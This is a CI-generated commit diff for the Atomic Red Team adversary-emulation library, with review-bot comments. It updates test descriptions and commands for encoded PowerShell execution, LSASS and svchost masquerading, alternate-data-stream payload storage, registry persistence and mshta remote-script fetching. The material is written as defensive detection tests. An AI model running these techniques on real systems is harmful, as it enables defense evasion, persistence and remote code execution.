Generate docs from job=validate_atomics_generate_docs branch=master

CircleCI Atomic Red Team doc generator
2020-03-19 19:17:26 +00:00
parent 1f74427802
commit 8a99c40601
7 changed files with 60 additions and 58 deletions
+1 -1
@@ -50,6 +50,7 @@ chmod +x /tmp/art.sh
## Atomic Test #2 - Execute base64-encoded PowerShell
Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
Upon execution the test will print "Hey, Atomic!" to the PowerShell session
**Supported Platforms:** Windows
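Review bot: every `.md` hunk in this commit is generator output of the atomic YAML, so wording fixes belong in the source YAML and will flow through on the next run; in this hunk the added line "Upon execution the test will print "Hey, Atomic!" to the PowerShell session" has no terminating period, and the same is true of each "Upon execution..." line added in the other `.md` files below.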
@@ -70,7 +71,6 @@ $OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand
```
+4 -2
@@ -41,6 +41,7 @@ An example of abuse of trusted locations in Linux would be the <code>/bin</code
## Atomic Test #1 - Masquerading as Windows LSASS process
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session
**Supported Platforms:** Windows
@@ -52,8 +53,8 @@ Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsas
```cmd
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
%SystemRoot%\Temp\lsass.exe /B
```
#### Cleanup Commands:
@@ -124,6 +125,7 @@ del /Q /F %APPDATA%\notepad.exe >nul 2>&1
## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
**Supported Platforms:** Windows
+1
@@ -57,6 +57,7 @@ esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
## Atomic Test #2 - Store file in Alternate Data Stream (ADS)
Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test
**Supported Platforms:** Windows
+1 -1
@@ -262,7 +262,7 @@ Remove-item $key -Recurse -ErrorAction Ignore
<br/>
## Atomic Test #7 - Javascript in registry
placing javascript in registry for persistence
Upon execution, a javascript block will be placed in the registry for persistence
**Supported Platforms:** Windows
+2
@@ -25,6 +25,7 @@ Mshta.exe can be used to bypass application whitelisting solutions that do not a
## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
Test execution of a remote script using mshta.exe
Upon execution calc.exe will be launched
**Supported Platforms:** Windows
@@ -108,6 +109,7 @@ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit
## Atomic Test #4 - Mshta Executes Remote HTML Application (HTA)
Execute an arbitrary remote HTA.
Upon execution calc.exe will be launched
**Supported Platforms:** Windows
+3 -6
@@ -15,8 +15,8 @@ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.
## Atomic Test #1 - Indirect Command Execution - pcalua.exe
The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface.
[Reference](https://twitter.com/KyleHanslovan/status/912659279806640128)
Upon execution, calc.exe should open
**Supported Platforms:** Windows
@@ -27,8 +27,7 @@ The Program Compatibility Assistant (pcalua.exe) may invoke the execution of pro
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process | Process to execute | string | calc.exe|
| payload_path | Path to payload | path | c:&#92;temp&#92;payload.dll|
| payload_cpl_path | Path to payload | path | C:&#92;Windows&#92;system32&#92;javacpl.cpl -c Java|
| payload_path | Path to payload | path | C:&#92;Windows&#92;System32&#92;calc.exe|
#### Attack Commands: Run with `command_prompt`!
@@ -37,7 +36,6 @@ The Program Compatibility Assistant (pcalua.exe) may invoke the execution of pro
```cmd
pcalua.exe -a #{process}
pcalua.exe -a #{payload_path}
pcalua.exe -a #{payload_cpl_path}
```
@@ -50,10 +48,9 @@ pcalua.exe -a #{payload_cpl_path}
## Atomic Test #2 - Indirect Command Execution - forfiles.exe
forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface.
[Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md)
"This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe"
Upon execution calc.exe will be opened
**Supported Platforms:** Windows
+48 -48
@@ -8748,8 +8748,8 @@ defense-evasion:
- name: Indirect Command Execution - pcalua.exe
description: |
The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface.
[Reference](https://twitter.com/KyleHanslovan/status/912659279806640128)
Upon execution, calc.exe should open
supported_platforms:
- windows
input_arguments:
@@ -8760,24 +8760,19 @@ defense-evasion:
payload_path:
description: Path to payload
type: path
default: c:\temp\payload.dll
payload_cpl_path:
description: Path to payload
type: path
default: C:\Windows\system32\javacpl.cpl -c Java
default: C:\Windows\System32\calc.exe
executor:
name: command_prompt
elevation_required: false
command: |
pcalua.exe -a #{process}
pcalua.exe -a #{payload_path}
pcalua.exe -a #{payload_cpl_path}
- name: Indirect Command Execution - forfiles.exe
description: |
forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface.
[Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md)
"This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe"
Upon execution calc.exe will be opened
supported_platforms:
- windows
input_arguments:
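Review bot: after this hunk `process` and `payload_path` both default to `calc.exe`, so `pcalua.exe -a #{process}` and `pcalua.exe -a #{payload_path}` launch the same binary twice and the description "Path to payload" no longer says what the second argument is for; either give `payload_path` a distinct default that exists on a stock host or fold it into `process`. Removing `payload_cpl_path` is right: its value `C:\Windows\system32\javacpl.cpl -c Java` was a command line, not a `path`, and `c:\temp\payload.dll` pointed at a file the test never creates. In the forfiles description, the quoted sentence ("This is basically saying for each occurrence of notepad.exe...") should say it is taken from the linked LOLBAS page, and "Upon execution calc.exe will be opened" wants a period.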
@@ -8787,6 +8782,7 @@ defense-evasion:
default: calc.exe
executor:
name: command_prompt
elevation_required: false
command: |
forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
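Review bot: `elevation_required: false` is correct for forfiles, but the second executor line, `forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"`, refers to a file the test never creates, so it errors on a stock host while the new description only promises that calc.exe opens; either provision that file in a setup step or move the line into the description as an illustration and keep the executor to the first command.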
@@ -9672,18 +9668,17 @@ defense-evasion:
identifier: T1036
atomic_tests:
- name: Masquerading as Windows LSASS process
description: 'Copies cmd.exe, renames it, and launches it to masquerade as an
instance of lsass.exe.
'
description: |
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: |
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
%SystemRoot%\Temp\lsass.exe /B
cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
'
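Review bot: `/B` on `%SystemRoot%\Temp\lsass.exe /B` is a switch of `start`, not of cmd.exe, so the renamed shell ignores it and opens interactively, which is exactly why the new description has to admit that Invoke-AtomicTest hangs until the timeout; either drop the flag or say in the description why the hang is expected. The description also claims "cmd will be launched by powershell", but the executor in this hunk is `name: command_prompt`; and "The test" should be lower-case mid-sentence, with "120 second" hyphenated as "120-second".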
@@ -9717,10 +9712,9 @@ defense-evasion:
'
- name: Masquerading - wscript.exe running as svchost.exe
description: 'Copies wscript.exe, renames it, and launches it to masquerade
as an instance of svchost.exe.
'
description: |
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
supported_platforms:
- windows
executor:
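Review bot: "wscript will have been renamed to svchost and ran out of the temp folder" should read "run from the temp folder it was copied to"; also, "no windows will remain open" is what an observer sees on success and on failure alike, so name the observable artifact (a copy of wscript.exe named svchost.exe in that folder for the duration of the run) and end the sentence with a period.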
@@ -10073,7 +10067,8 @@ defense-evasion:
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
Remove-item $key -Recurse -ErrorAction Ignore
- name: Javascript in registry
description: 'placing javascript in registry for persistence
description: 'Upon execution, a javascript block will be placed in the registry
for persistence
'
supported_platforms:
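Review bot: unlike the other descriptions in this commit, this one replaces the summary line ("placing javascript in registry for persistence") instead of appending the "Upon execution..." line after it, so the test loses its one-sentence statement of what it does; keep both lines, capitalise "JavaScript", and use the `|` block scalar the other tests switched to rather than the wrapped single-quoted scalar.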
@@ -10085,8 +10080,10 @@ defense-evasion:
Settings" -Name T1112 -Value "<script>"
'
cleanup_command: Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
cleanup_command: 'Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112 -ErrorAction Ignore
'
T1170:
technique:
x_mitre_data_sources:
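Review bot: this hunk changes nothing but the serializer's quoting of `cleanup_command` (a plain scalar becomes a single-quoted one with a trailing newline), and the same churn appears in the `Remove-Item` and `Remove-ItemProperty` cleanup hunks further down; the trailing newline is harmless to the executor, but emitting the YAML with one fixed quoting style would keep these no-op hunks out of doc-generation commits.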
@@ -10176,9 +10173,9 @@ defense-evasion:
identifier: T1170
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
description: 'Test execution of a remote script using mshta.exe
'
description: |
Test execution of a remote script using mshta.exe
Upon execution calc.exe will be launched
supported_platforms:
- windows
input_arguments:
@@ -10189,8 +10186,9 @@ defense-evasion:
executor:
name: command_prompt
elevation_required: false
command: "mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
\ \n"
command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
'
- name: Mshta calls a local VBScript file to launch notepad.exe
description: Tests execution of a local program by a VBScript file called by
Mshta
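Review bot: the quoting change is behaviour-preserving: inside a single-quoted YAML scalar `''` is a literal `'`, so `GetObject(''script:#{file_url}'')` yields the same command string as before, and the only real difference is that the old double-quoted value ended in `\ \n` (an escaped trailing space before the newline) which is now gone; worth a line in the commit message, since it is the one hunk in this block that is not a description edit.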
@@ -10220,9 +10218,9 @@ defense-evasion:
'
- name: Mshta Executes Remote HTML Application (HTA)
description: 'Execute an arbitrary remote HTA.
'
description: |
Execute an arbitrary remote HTA.
Upon execution calc.exe will be launched
supported_platforms:
- windows
input_arguments:
@@ -10354,10 +10352,9 @@ defense-evasion:
expand \\webdav\folder\file.bat #{path}\file.txt:file.bat
esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
- name: Store file in Alternate Data Stream (ADS)
description: 'Storing files in Alternate Data Stream (ADS) similar to Astaroth
malware.
'
description: |
Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test
supported_platforms:
- windows
input_arguments:
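Review bot: "Upon execution cmd will run and attempt to launch desktop.ini" does not match the executor visible just below, which runs `cmd /c type #{payload_path} > #{ads_file_path}:#{ads_name}`, i.e. it writes the payload into the named stream and launches nothing; say that the payload is copied into an alternate data stream of `#{ads_file_path}` and that no window remains open.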
@@ -10382,7 +10379,9 @@ defense-evasion:
New-Item -ItemType Directory -Force -Path C:\Users\Public\Libraries\yanki
}
Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
cleanup_command: Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
'
T1126:
technique:
x_mitre_data_sources:
@@ -10612,10 +10611,9 @@ defense-evasion:
chmod +x /tmp/art.sh
/tmp/art.sh
- name: Execute base64-encoded PowerShell
description: 'Creates base64-encoded PowerShell code and executes it. This is
used by numerous adversaries and malicious tools.
'
description: |
Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
Upon execution the test will print "Hey, Atomic!" to the PowerShell session
supported_platforms:
- windows
input_arguments:
@@ -10631,7 +10629,6 @@ defense-evasion:
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand
- name: Execute base64-encoded PowerShell from Windows Registry
description: 'Stores base64-encoded PowerShell code in the Windows Registry
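Review bot: dropping the bare `$EncodedCommand` line is the only executor change in this file (the base64 string is no longer echoed before `powershell.exe -EncodedCommand $EncodedCommand` runs) and nothing in the description mentions it; if the intent is that only "Hey, Atomic!" appears, as the new description says, that is fine, but confirm the source atomic change was deliberate rather than lost in the regeneration.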
@@ -10666,7 +10663,9 @@ defense-evasion:
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage}
-Name #{registry_entry_storage}'
-Name #{registry_entry_storage}
'
T1502:
technique:
x_mitre_data_sources:
@@ -22859,9 +22858,9 @@ execution:
identifier: T1170
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
description: 'Test execution of a remote script using mshta.exe
'
description: |
Test execution of a remote script using mshta.exe
Upon execution calc.exe will be launched
supported_platforms:
- windows
input_arguments:
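Review bot: the `execution:` section repeats the T1170 atomics verbatim from `defense-evasion:`, so the three hunks from here on mirror the earlier mshta hunks line for line; they do match, which is what the generator should produce, but carrying two copies in the index is why every mshta edit shows up twice and is worth de-duplicating at the generator level.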
@@ -22872,8 +22871,9 @@ execution:
executor:
name: command_prompt
elevation_required: false
command: "mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
\ \n"
command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
'
- name: Mshta calls a local VBScript file to launch notepad.exe
description: Tests execution of a local program by a VBScript file called by
Mshta
@@ -22903,9 +22903,9 @@ execution:
'
- name: Mshta Executes Remote HTML Application (HTA)
description: 'Execute an arbitrary remote HTA.
'
description: |
Execute an arbitrary remote HTA.
Upon execution calc.exe will be launched
supported_platforms:
- windows
input_arguments: